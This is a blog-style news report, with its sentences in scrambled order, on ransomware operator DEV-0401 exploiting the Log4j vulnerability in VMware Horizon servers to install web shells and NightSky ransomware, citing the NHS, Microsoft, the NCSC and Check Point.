In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted. Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability. Since being uncovered in early December 2021 threat actors have taken advantage of the opportunities presented by the Log4J vulnerability.Īccording to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability. The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).”īased on Microsoft’s analysis the attackers are using command and control (CnC) servers that spoof legitimate domains. The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401. The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam. “Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said. On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”. VMware Horizon is a virtual desktop provider which leverages the hybrid cloud. The Log4j vulnerability continues to be exploited by threat actors and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in the VMware Horizon servers.Īccording to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells, that can be used to carry out the deployment of malicious software, data exfiltration and the deployment of ransomware.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |